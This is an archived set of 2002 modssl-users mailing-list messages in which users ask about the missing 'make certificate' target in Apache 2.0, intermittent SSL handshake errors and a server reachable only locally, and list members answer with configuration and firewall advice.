Date: Thu, 16 May 2002 14:06:19 +0900
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="----=_NextPart_000_0027_01C1FCE2.D9FEFDE0"
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2600.0000
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "mineka fujimoto" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

This is a multi-part message in MIME format.

------=_NextPart_000_0027_01C1FCE2.D9FEFDE0
Content-Type: text/plain;
	charset="iso-2022-jp"
Content-Transfer-Encoding: 7bit


Hello

I am a student to study Linux.
I want to use SSL in apache2.0.36
I stop apache 1.3 and tar apache2.0.36..     
I use RedHat Linux7.1 

I use ./configure --prefix=/usr/local_apache2 --enable-mods-shared="ssl"

 Then I use make certificate TYPE=custom.

But I get message $B!V(Bno target to make      discontinuation$B!W(B 

Please help me.

Thanks.

Micky



------=_NextPart_000_0027_01C1FCE2.D9FEFDE0
Content-Type: text/html;
	charset="iso-2022-jp"
Content-Transfer-Encoding: quoted-printable









 


Hello


 


I am a student to study=20
Linux.


I want to use SSL in=20
apache2.0.36


I stop apache 1.3 and tar=20
apache2.0.36..     


I use RedHat Linux7.1 =



 


I use ./configure=20
--prefix=3D/usr/local_apache2 --enable-mods-shared=3D"ssl"


 


 Then I use make =
certificate=20
TYPE=3Dcustom.


 


But I get message =
=1B$B!V=1B(Bno target to=20
make      discontinuation=1B$B!W=1B(B =



 


Please help me.


 


Thanks.


 


Micky


 


 


------=_NextPart_000_0027_01C1FCE2.D9FEFDE0--
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu May 16 17:54:15 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id RAA26772; Thu, 16 May 2002 17:52:39 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from it0033.it-action.com id RAA26730; Thu, 16 May 2002 17:52:01 +0200 (MET DST)
Received: from itaction.co.uk ([212.36.137.30]) by
          it0033.it-action.com (Netscape Messaging Server 4.15) with ESMTP
          id GW7O2C00.9A3 for ; Thu, 16 May 2002
          16:51:48 +0100 
Message-ID: <3CE3D592.3010006@itaction.co.uk>
Date: Thu, 16 May 2002 16:51:46 +0100
From: "Peter Viertel" 
Organization: IT Action Ltd
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.0.0+) Gecko/20020429
X-Accept-Language: en-gb, en
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: Re: make certificate TYPE=custom?
References: <002b01c1fc97$6a251180$ac130385@kondo12>
Content-Type: multipart/alternative;
 boundary="------------050100070901030903030605"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Peter Viertel" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users


--------------050100070901030903030605
Content-Type: text/plain; charset=ISO-2022-JP
Content-Transfer-Encoding: 7bit

make certificate does not work in apache 2 yet.

copy your key and certificate from the 1.3 installation


mineka fujimoto wrote:

> Hello
> I am a student to study Linux.
> I wantto use SSL in apache2.0.36
> I stop apache 1.3 and tar apache2.0.36..
> I use RedHat Linux7.1
> I use ./configure --prefix=/usr/local_apache2 --enable-mods-shared="ssl"
> Then I use make certificate TYPE=custom.
> But I get message $B!V(Bno target to make discontinuation$B!W(B
> Please help me.
> Thanks.
> Micky



--------------050100070901030903030605
Content-Type: text/html; charset=ISO-2022-JP
Content-Transfer-Encoding: 7bit




  
  


make certificate does not work in apache 2 yet.



copy your key and certificate from the 1.3 installation





mineka fujimoto wrote:




  

  

  
  
 


  
Hello


  
 


  
I am a student to study  Linux.


  
I want to use SSL in  apache2.0.36


  
I stop apache 1.3 and tar  apache2.0.36..     


  
I use RedHat Linux7.1 


  
 


  
I use ./configure  --prefix=/usr/local_apache2
--enable-mods-shared="ssl"


  
 


  
 Then I use make certificate  TYPE=custom.


  
 


  
But I get message $B!V(Bno target to
 make      discontinuation$B!W(B 


  
 


  
Please help me.


  
 


  
Thanks.


  
 


  
Micky


  
 


  
 








--------------050100070901030903030605--

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu May 16 18:32:23 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id SAA00636; Thu, 16 May 2002 18:31:30 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from deepthought.cs.virginia.edu id SAA00592; Thu, 16 May 2002 18:30:51 +0200 (MET DST)
Received: from localhost (root@localhost)
	by deepthought.cs.virginia.edu (8.11.6/8.11.4) with ESMTP id g4GGTwJ14735
	for ; Thu, 16 May 2002 12:29:58 -0400
Date: Thu, 16 May 2002 12:29:58 -0400 (EDT)
From: Cliff Woolley 
X-X-Sender: root@deepthought.cs.virginia.edu
To: modssl-users@modssl.org
Subject: Re: make certificate TYPE=custom?
In-Reply-To: <3CE3D592.3010006@itaction.co.uk>
Message-ID: 
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Cliff Woolley 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

On Thu, 16 May 2002, Peter Viertel wrote:

> make certificate does not work in apache 2 yet.

IIRC, the official consensus on the httpd dev list was that will NOT
support make certificate in Apache 2.x at all, with the reasoning that
test certificates just tend to confuse people who don't know what they're
doing.  Granted, there is a documentation bug which still indicates that
make certificate is available.  There's a bug report about that and our
doc people will hopefully get around to fixing that soon.

I'm not saying I personally agree with the dropping of make certificate,
but it was the group's decision, not mine.  And I suppose I see the
reasoning.  All you need is a few commands from openssl to do the same
thing, and those are well-documented.

Just so you know.

--Cliff

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu May 16 20:28:58 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id UAA08831; Thu, 16 May 2002 20:27:39 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from visp.engelschall.com id UAA08690; Thu, 16 May 2002 20:26:08 +0200 (MET DST)
Received: by visp.engelschall.com (Postfix, from userid 1005)
	id AE1EB4CE73D; Thu, 16 May 2002 20:26:04 +0200 (CEST)
Received: by en1.engelschall.com (Sendmail 8.11.0+) for modssl-users@modssl.org
	id g4GIKvM51927; Thu, 16 May 2002 20:20:57 +0200 (CEST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from hotmail.com id NAA08157; Thu, 16 May 2002 13:48:30 +0200 (MET DST)
Received: from mail pickup service by hotmail.com with Microsoft SMTPSVC;
	 Thu, 16 May 2002 04:47:23 -0700
Received: from 202.228.202.14 by lw12fd.law12.hotmail.msn.com with HTTP;
	Thu, 16 May 2002 11:47:23 GMT
X-Originating-IP: [202.228.202.14]
From: "Nay Mooly" 
To: modssl-users@modssl.org
Subject: certificate in Apache2.0.36!
Date: Thu, 16 May 2002 20:47:23 +0900
Mime-Version: 1.0
Content-Type: text/plain; format=flowed
Message-ID: 
X-OriginalArrivalTime: 16 May 2002 11:47:23.0672 (UTC) FILETIME=[718F2180:01C1FCCF]
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Nay Mooly" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users


Hello

I am a student to study Linux.
I use RedHat Linux 7.1.
I want to use ssl with mod_ssl in Apache2.0.36.

I use    # ./configure --prefix=/usr/local/apache2 
--enable-mods-shared="ssl"
         # make
         # make certificate TYPE=custom
Then I get this message
         make*** no rule to make target 'certificate'   discontinuation

Please help me.
Thanks

---Nay---

_________________________________________________________________
MSN Photos is the easiest way to share and print your photos: 
http://photos.msn.com/support/worldwide.aspx
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu May 16 20:29:05 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id UAA08844; Thu, 16 May 2002 20:27:55 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from visp.engelschall.com id UAA08695; Thu, 16 May 2002 20:26:10 +0200 (MET DST)
Received: by visp.engelschall.com (Postfix, from userid 1005)
	id BCE1D4CE742; Thu, 16 May 2002 20:26:04 +0200 (CEST)
Received: by en1.engelschall.com (Sendmail 8.11.0+) for modssl-users@modssl.org
	id g4GILXC51951; Thu, 16 May 2002 20:21:33 +0200 (CEST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from tsmtp7.mail.isp id RAA26286; Thu, 16 May 2002 17:47:08 +0200 (MET DST)
Received: from teleline.es ([10.10.21.90]) by tsmtp7.mail.isp
          (Netscape Messaging Server 4.15 tsmtp7 Mar 14 2002 21:29:48)
          with ESMTP id GW7NS402.4L9 for ; Thu,
          16 May 2002 17:45:40 +0200 
From: MARIOCQ 
To: modssl-users@modssl.org
Message-ID: <13a1416beb.16beb13a14@teleline.es>
Date: Thu, 16 May 2002 17:45:40 +0200
X-Mailer: Netscape Webmail
MIME-Version: 1.0
Content-Language: es
Subject: apache +mod_ssl
X-Accept-Language: es
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: MARIOCQ 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Hello all:

	We are getting the next errors in the error log of our apache 
server. 

[Tue May 14 13:59:57 2002] [error] mod_ssl: SSL error on reading data 
(OpenSSL library error follows)

[Tue May 14 13:59:57 2002] [error] OpenSSL: error:140940E5:SSL 
routines:SSL3_READ_BYTES:ssl handshake failure

[Tue May 14 13:59:58 2002] [error] mod_ssl: SSL handshake interrupted 
by system [Hint: Stop button pressed in browser?!] (System error 
follows)

[Tue May 14 13:59:58 2002] [error] System: Connection timed out (errno: 
238)

[Tue May 14 14:22:22 2002] [error] mod_ssl: SSL handshake interrupted 
by system [Hint: Stop button pressed in browser?!] (System error 
follows)

[Tue May 14 14:22:22 2002] [error] System: Connection refused (errno: 
239)

[Tue May 14 14:22:41 2002] [error] [client 192.168.19.201] (2)No such 
file or directory: file permissions deny server 
access: /html/images/fon2081.gif

[Tue May 14 14:25:17 2002] [error] System: Connection reset by peer 
(errno: 232)

	These errors seem to be sporadic and not related to specific 
web browser
versions.

	Does anyone know what can be happening here or how can we get 
more datas?

Best regards,
Mario.

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu May 16 20:29:23 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id UAA08923; Thu, 16 May 2002 20:28:38 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from visp.engelschall.com id UAA08696; Thu, 16 May 2002 20:26:10 +0200 (MET DST)
Received: by visp.engelschall.com (Postfix, from userid 1005)
	id DC55E4CE774; Thu, 16 May 2002 20:26:04 +0200 (CEST)
Received: by en1.engelschall.com (Sendmail 8.11.0+) for modssl-users@modssl.org
	id g4GILhZ51963; Thu, 16 May 2002 20:21:43 +0200 (CEST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from fortress.internal.net id TAA03210; Thu, 16 May 2002 19:10:02 +0200 (MET DST)
Received: by fortress.internal.net (Postfix, from userid 66)
	id 2D34A6720B; Thu, 16 May 2002 19:09:55 +0200 (CEST)
Content-Transfer-Encoding: 7bit
Content-Type: text/plain; charset=us-ascii
Date: Thu, 16 May 2002 19:11:57 +0200
From: Heribert Steuer 
Message-ID: <3CE3E85D.9C3B3F46@stockmanagement.de>
MIME-Version: 1.0
Received: from stockmanagement.de (storage.freiburg.peh [192.168.30.6])
	by fortress.internal.net (AvMailGate-6.11.0.2) id 18882-520D23B3;
	Thu, 16 May 2002 19:09:05 +0200
Subject: handshake problem with IE
To: modssl-users@modssl.org
X-Accept-Language: en
X-AntiVirus: OK! AvMailGate Version 6.11.0.5
	 at fortress has not found any known virus in this email.
X-Mailer: Mozilla 4.79 [en] (X11; U; OpenBSD 3.0 i386)
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Heribert Steuer 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Hello everybody,

i was already reading the posts on this issue, but all suggested tips
didnt help at all.
server is apache (see version numbers below) running on OpenBSD
3.0stable
client is Microsoft Internet Explorer 6.0.2600.000 with 128bit
encryption


the logs say the following  (at least they are full of it):

[Thu May 16 18:52:12 2002] [error] mod_ssl: SSL handshake interrupted by
system [Hint: Stop button pressed in browser?!] (System error follows)
[Thu May 16 18:52:12 2002] [error] System: Connection reset by peer
(errno: 54)


ssl_engine_log is :

[16/May/2002 18:52:13 06053] [info]  Connection to child 0 established
(server cyrus.freiburg.peh:443, client 192.168.30.30)
[16/May/2002 18:52:13 06053] [info]  Seeding PRNG with 1160 bytes of
entropy
[16/May/2002 18:52:13 06053] [trace] OpenSSL: Handshake: start
[16/May/2002 18:52:13 06053] [trace] OpenSSL: Loop: before/accept
initialization
[16/May/2002 18:52:13 06053] [debug] OpenSSL: read 11/11 bytes from
BIO#00A259C0 [mem: 00CCE000] (BIO dump follows)
[...]
[16/May/2002 18:52:13 06053] [debug] OpenSSL: read 67/67 bytes from
BIO#00A259C0 [mem: 00CCE00B] (BIO dump follows)
[...]
[16/May/2002 18:52:13 06053] [trace] OpenSSL: Loop: SSLv3 read client
hello A
[16/May/2002 18:52:13 06053] [trace] OpenSSL: Loop: SSLv3 write server
hello A
[16/May/2002 18:52:13 06053] [trace] OpenSSL: Loop: SSLv3 write
certificate A
[16/May/2002 18:52:13 06053] [trace] OpenSSL: Loop: SSLv3 write server
done A
[16/May/2002 18:52:13 06053] [debug] OpenSSL: write 762/762 bytes to
BIO#00A259C0 [mem: 00CA3000] (BIO dump follows)
[...]
[16/May/2002 18:52:13 06053] [trace] OpenSSL: Loop: SSLv3 flush data
[16/May/2002 18:52:13 06053] [debug] OpenSSL: I/O error, 5 bytes
expected to read on BIO#00A259C0 [mem: 00CCE000]
[16/May/2002 18:52:13 06053] [trace] OpenSSL: Exit: error in SSLv3 read
client certificate A
[16/May/2002 18:52:13 06053] [trace] OpenSSL: Exit: error in SSLv3 read
client certificate A
[16/May/2002 18:52:13 06053] [error] SSL handshake interrupted by system
[Hint: Stop button pressed in browser?!] (System error follows)
[16/May/2002 18:52:13 06053] [error] System: Connection reset by peer
(errno: 54)



OpenSSL 0.9.6b [engine] 9 Jul 2001
mod_ssl version 2.8
mod_perl-1.26

Server version: Apache/1.3.19 (Unix)
Server built:   Oct 15 2001 11:48:41
Server's Module Magic Number: 19990320:10
Server compiled with....
 -D EAPI
 -D HAVE_MMAP
 -D HAVE_SHMGET
 -D USE_MMAP_SCOREBOARD
 -D USE_MMAP_FILES
 -D USE_FLOCK_SERIALIZED_ACCEPT
 -D SINGLE_LISTEN_UNSERIALIZED_ACCEPT
 -D HTTPD_ROOT="/var/www"
 -D SUEXEC_BIN="/usr/sbin/suexec"
 -D DEFAULT_PIDLOG="logs/httpd.pid"
 -D DEFAULT_SCOREBOARD="logs/httpd.scoreboard"
 -D DEFAULT_LOCKFILE="logs/httpd.lock"
 -D DEFAULT_XFERLOG="logs/access_log"
 -D DEFAULT_ERRORLOG="logs/error_log"
 -D TYPES_CONFIG_FILE="conf/mime.types"
 -D SERVER_CONFIG_FILE="conf/httpd.conf"
 -D ACCESS_CONFIG_FILE="conf/access.conf"
 -D RESOURCE_CONFIG_FILE="conf/srm.conf"


if theres a need for more details, just let me know. this problem occurs
on 3 different machines
(all running OpenBSD with different versions of apache/mod_ssl)
i hope someone can help.


thanks in advance

Heribert Steuer
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu May 16 20:49:13 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id UAA11356; Thu, 16 May 2002 20:49:04 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from deepthought.cs.virginia.edu id UAA11274; Thu, 16 May 2002 20:47:58 +0200 (MET DST)
Received: from localhost (root@localhost)
	by deepthought.cs.virginia.edu (8.11.6/8.11.4) with ESMTP id g4GIl4t14917
	for ; Thu, 16 May 2002 14:47:04 -0400
Date: Thu, 16 May 2002 14:47:04 -0400 (EDT)
From: Cliff Woolley 
X-X-Sender: root@deepthought.cs.virginia.edu
To: modssl-users@modssl.org
Subject: Re: certificate in Apache2.0.36!
In-Reply-To: 
Message-ID: 
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Cliff Woolley 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

On Thu, 16 May 2002, Nay Mooly wrote:

> I want to use ssl with mod_ssl in Apache2.0.36.
>          # make certificate TYPE=custom
> Then I get this message
>          make*** no rule to make target 'certificate'   discontinuation

Please see my message from earlier today on this subject, subject "Re:
make certificate TYPE=custom?"

--Cliff

--------------------------------------------------------------
   Cliff Woolley
   cliffwoolley@yahoo.com
   Charlottesville, VA


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu May 16 21:01:08 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id VAA12391; Thu, 16 May 2002 21:01:02 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from opie.usu.edu id UAA12273; Thu, 16 May 2002 20:59:42 +0200 (MET DST)
Received: from RM426 ("port 1915"@rm426.cs.usu.edu [129.123.109.181])
 by cc.usu.edu (PMDF V5.2-32 #39089)
 with SMTP id <01KHSOHL92RC90U8HF@cc.usu.edu> for modssl-users@modssl.org; Thu,
 16 May 2002 12:59:30 MDT
Date: Thu, 16 May 2002 12:56:32 -0600
From: Alex Earl 
Subject: Runs on local...but can't see it anywhere else
To: modssl-users@modssl.org
Message-id: <003001c1fd0b$651b9aa0$b56d7b81@RM426>
MIME-version: 1.0
X-MIMEOLE: Produced By Microsoft MimeOLE V6.00.2600.0000
X-Mailer: Microsoft Outlook Express 6.00.2600.0000
Content-type: text/plain;	charset="iso-8859-1"
Content-transfer-encoding: 7bit
X-Priority: 3
X-MSMail-priority: Normal
References: 
 
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Alex Earl 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Hi!

First off I would like to thank you for your help and knowledge! I enjoy
this forum a lot!

I have set up mod_ssl with Apache 1.3 and everything seems to run just fine
on the local machine. I can curl https://localhost (and the actual server
address) and get the right stuff...but when I try to access it from anywhere
else I get a server not found error. Any ideas?!

Thanks!

Alex Earl

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri May 17 08:18:12 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id IAA26493; Fri, 17 May 2002 08:17:28 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from kaikoura.fel.tno.nl id IAA26472; Fri, 17 May 2002 08:16:58 +0200 (MET DST)
Received: by kaikoura.fel.tno.nl; id IAA22626; Fri, 17 May 2002 08:16:49 +0200 (MET DST)
Received: from fs1.fel.tno.nl(134.203.8.201) by kaikoura.fel.tno.nl via smap (V1.0)
	id xma022604; Fri, 17 May 02 08:16:29 +0200
Received: from pc1928.fel.tno.nl ([134.203.9.113]) by
          fs1.fel.tno.nl (Netscape Messaging Server 4.15) with SMTP id
          GW8S3J00.2CI for ; Fri, 17 May 2002
          08:16:31 +0200 
Received: FROM fel.tno.nl BY pc1928.fel.tno.nl ; Fri May 17 08:16:30 2002 +0200
Message-ID: <3CE4A03D.24CDD2AE@fel.tno.nl>
Date: Fri, 17 May 2002 08:16:29 +0200
From: "DG Speekenbrink" 
Organization: TNO-FEL
X-Mailer: Mozilla 4.75 [en]C-Netscape2000  (Win95; U)
X-Accept-Language: en,nl,fr,de
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: Re: Runs on local...but can't see it anywhere else
References:  <003001c1fd0b$651b9aa0$b56d7b81@RM426>
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "DG Speekenbrink" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Hi,

This sounds more like a general Apache config problem.
is it possible to request pages with the regular http:// request?

If not, some settings in your httpd.conf are the problem.

Good luck,

Dennis

Alex Earl wrote:
> 
> Hi!
> 
> First off I would like to thank you for your help and knowledge! I enjoy
> this forum a lot!
> 
> I have set up mod_ssl with Apache 1.3 and everything seems to run just fine
> on the local machine. I can curl https://localhost (and the actual server
> address) and get the right stuff...but when I try to access it from anywhere
> else I get a server not found error. Any ideas?!
> 
> Thanks!
> 
> Alex Earl
> 
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri May 17 11:46:09 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id LAA11348; Fri, 17 May 2002 11:45:11 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from it0033.it-action.com id LAA11309; Fri, 17 May 2002 11:44:36 +0200 (MET DST)
Received: from itaction.co.uk ([212.36.137.30]) by
          it0033.it-action.com (Netscape Messaging Server 4.15) with ESMTP
          id GW91Q900.P9E for ; Fri, 17 May 2002
          10:44:33 +0100 
Message-ID: <3CE4D102.3010406@itaction.co.uk>
Date: Fri, 17 May 2002 10:44:34 +0100
From: "Peter Viertel" 
Organization: IT Action Ltd
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.0.0+) Gecko/20020429
X-Accept-Language: en-gb, en
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: Re: Runs on local...but can't see it anywhere else
References:  <003001c1fd0b$651b9aa0$b56d7b81@RM426>
Content-Type: text/plain; charset=us-ascii; format=flowed
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Peter Viertel" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

You say you can connect to the 'actual server address' while on the
actual machine but not from across the network.

You do not say which operating system you're using - but if it's redhat
linux for example, perhaps you've got iptables rules. Otherwise  is
network routing ok, like does the machien have it's default route set
correctly?

Alex Earl wrote:

>Hi!
>
>First off I would like to thank you for your help and knowledge! I enjoy
>this forum a lot!
>
>I have set up mod_ssl with Apache 1.3 and everything seems to run just fine
>on the local machine. I can curl https://localhost (and the actual server
>address) and get the right stuff...but when I try to access it from anywhere
>else I get a server not found error. Any ideas?!
>
>Thanks!
>
>Alex Earl
>
>______________________________________________________________________
>Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
>User Support Mailing List                      modssl-users@modssl.org
>Automated List Manager                            majordomo@modssl.org
>
>


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri May 17 12:00:07 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id LAA12244; Fri, 17 May 2002 11:59:10 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from maggotts.rnib.org.uk id LAA12235; Fri, 17 May 2002 11:59:02 +0200 (MET DST)
From: John.Airey@rnib.org.uk
Received: from pboroweb.rnib.org.uk (pboroweb.rnib.org.uk [194.128.16.145])
	by maggotts.rnib.org.uk (8.11.6/8.11.6) with ESMTP id g4H9wfv26519
	for ; Fri, 17 May 2002 09:58:46 GMT
Received: by pboroweb.rnib.org.uk with Internet Mail Service (5.5.2650.21)
	id ; Fri, 17 May 2002 10:58:38 +0100
Message-ID: <9B66BBD37D5DD411B8CE00508B69700F02067099@pborolocal.rnib.org.uk>
To: modssl-users@modssl.org
Subject: RE: Runs on local...but can't see it anywhere else
Date: Fri, 17 May 2002 10:58:36 +0100
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2650.21)
Content-Type: text/plain;
	charset="iso-8859-1"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: John.Airey@rnib.org.uk
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

A small correction, RedHat Linux is still using ipchains. 

ipchains -L

>From the command line as root will show if you have any ipchains rules.

The simplest way to fix is to type "setup", go into firewall configuration
and make the interface "trusted". It does neuter ipchains somewhat though.

- 
John Airey
Internet systems support officer, ITCSD, Royal National Institute of the
Blind,
Bakewell Road, Peterborough PE2 6XU,
Tel.: +44 (0) 1733 375299 Fax: +44 (0) 1733 370848 John.Airey@rnib.org.uk 

If Charles Darwin knew a fraction of what scientists know today, he'd never
have written the Origin of the Species.


> -----Original Message-----
> From: Peter Viertel [mailto:peter.viertel@itaction.co.uk]
> Sent: 17 May 2002 10:45
> To: modssl-users@modssl.org
> Subject: Re: Runs on local...but can't see it anywhere else
> 
> 
> You say you can connect to the 'actual server address' while on the
> actual machine but not from across the network.
> 
> You do not say which operating system you're using - but if 
> it's redhat
> linux for example, perhaps you've got iptables rules. Otherwise  is
> network routing ok, like does the machien have it's default route set
> correctly?
> 
> Alex Earl wrote:
> 
> >Hi!
> >
> >First off I would like to thank you for your help and 
> knowledge! I enjoy
> >this forum a lot!
> >
> >I have set up mod_ssl with Apache 1.3 and everything seems 
> to run just fine
> >on the local machine. I can curl https://localhost (and the 
> actual server
> >address) and get the right stuff...but when I try to access 
> it from anywhere
> >else I get a server not found error. Any ideas?!
> >
> >Thanks!
> >
> >Alex Earl
> >
> >_____________________________________________________________
> _________
> >Apache Interface to OpenSSL (mod_ssl)                   
> www.modssl.org
> >User Support Mailing List                      
> modssl-users@modssl.org
> >Automated List Manager                            
> majordomo@modssl.org
> >
> >
> 
> 
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
> 

- 

NOTICE: The information contained in this email and any attachments is 
confidential and may be legally privileged. If you are not the 
intended recipient you are hereby notified that you must not use, 
disclose, distribute, copy, print or rely on this email's content. If 
you are not the intended recipient, please notify the sender 
immediately and then delete the email and any attachments from your 
system.

RNIB has made strenuous efforts to ensure that emails and any 
attachments generated by its staff are free from viruses. However, it 
cannot accept any responsibility for any viruses which are 
transmitted. We therefore recommend you scan all attachments.

Please note that the statements and views expressed in this email 
and any attachments are those of the author and do not necessarily 
represent those of RNIB.

RNIB Registered Charity Number: 226227

Website: http://www.rnib.org.uk 

14th June 2002 is RNIB Look Loud Day - visit http://www.lookloud.org.uk to
find out all about it.

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri May 17 13:27:03 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id NAA19138; Fri, 17 May 2002 13:26:06 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from visp.engelschall.com id NAA19099; Fri, 17 May 2002 13:25:07 +0200 (MET DST)
Received: by visp.engelschall.com (Postfix, from userid 1005)
	id B55BC4CE698; Fri, 17 May 2002 13:25:06 +0200 (CEST)
Received: by en1.engelschall.com (Sendmail 8.11.0+) for modssl-users@modssl.org
	id g4HBOmS67005; Fri, 17 May 2002 13:24:48 +0200 (CEST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from localhost id AAA26096; Fri, 17 May 2002 00:18:23 +0200 (MET DST)
Date: Fri, 17 May 2002 00:18:23 +0200 (MET DST)
Message-Id: <200205162218.AAA26096@opensource.ee.ethz.ch>
From: modssl-bugdb@modssl.org
